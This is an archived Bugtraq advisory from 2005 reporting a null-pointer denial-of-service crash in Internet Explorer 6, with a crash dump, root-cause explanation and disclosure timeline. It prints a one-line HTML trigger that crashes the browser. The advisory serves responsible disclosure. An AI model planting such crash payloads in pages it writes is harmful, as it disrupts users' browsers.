Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1

from [bugtraq] Network Security [Permanent Link]
Subject: [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1
Date: 24 Dec 2005 23:42:40 -0000 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #4     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d663471
===================

Following HTML code forces M$ IE 6 to crash:

<table datasrc=".">


Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi=00000000 eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d663469 8bff             mov     edi,edi
        7d66346b 55               push    ebp
        7d66346c 8bec             mov     ebp,esp
        7d66346e 8b4110           mov     eax,[ecx+0x10]
FAULT ->7d663471 66833823         cmp     word ptr [eax],0x23   
ds:0023:00000000=????
        7d663475 7405             jz      mshtml+0x1b347c (7d66347c)
        7d663477 33c0             xor     eax,eax
        7d663479 40               inc     eax
        7d66347a eb1e             jmp     mshtml+0x1b349a (7d66349a)
        7d66347c ff7508           push    dword ptr [ebp+0x8]
        7d66347f 8b09             mov     ecx,[ecx]
        7d663481 83c002           add     eax,0x2
        7d663484 50               push    eax
        7d663485 e8466cebff       call    mshtml+0x6a0d0 (7d51a0d0)
        7d66348a 8bc8             mov     ecx,eax
        7d66348c e8ad44fbff     call mshtml!CreateHTMLPropertyPage+0x2432c 
(7d61793e)
        7d663491 33c9             xor     ecx,ecx
        7d663493 85c0             test    eax,eax
        7d663495 0f9cc1           setl    cl
        7d663498 8bc1             mov     eax,ecx
        7d66349a 5d               pop     ebp
        7d66349b c20400           ret     0x4

The access violation results in a null pointer dereference and is not 
exploitable. 

M$ IE parses the attribute value of 'datasrc' ("[n].[m]") in the 
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')

The reason for the crash is that the 0 byte long [n] (no memory is allocated 
for this string) is used without any validation.

For example:

char *t = NULL;

if(t[0] = 0x23)



o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:

M$ IE 6.0  - Windoze XP Pro SP2
M$ IE 6.0  - Windoze 2k SP4
M$ IE 5.5  - Windoze XP Pro SP2
M$ IE 5.01 - Windoze XP Pro SP2



o Disclosure Timeline:
=====================

10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@deneke.biz>

- --

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a                   
Comment: http://morph3us.org/

iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-----END PGP SIGNATURE-----
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1, bugtraq <=
Previous by Date:  Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure, contact . removethis
Next by Date:  Found new bug, hackeriri
Previous by Thread:  Airscanner Mobile Security Advisory #0508310 Spb Kiosk Engine Administrator Password & Information Disclosure, contact . removethis
Next by Thread:  Found new bug, hackeriri
Indexes:  [Date] [Thread] [Top] [All Lists]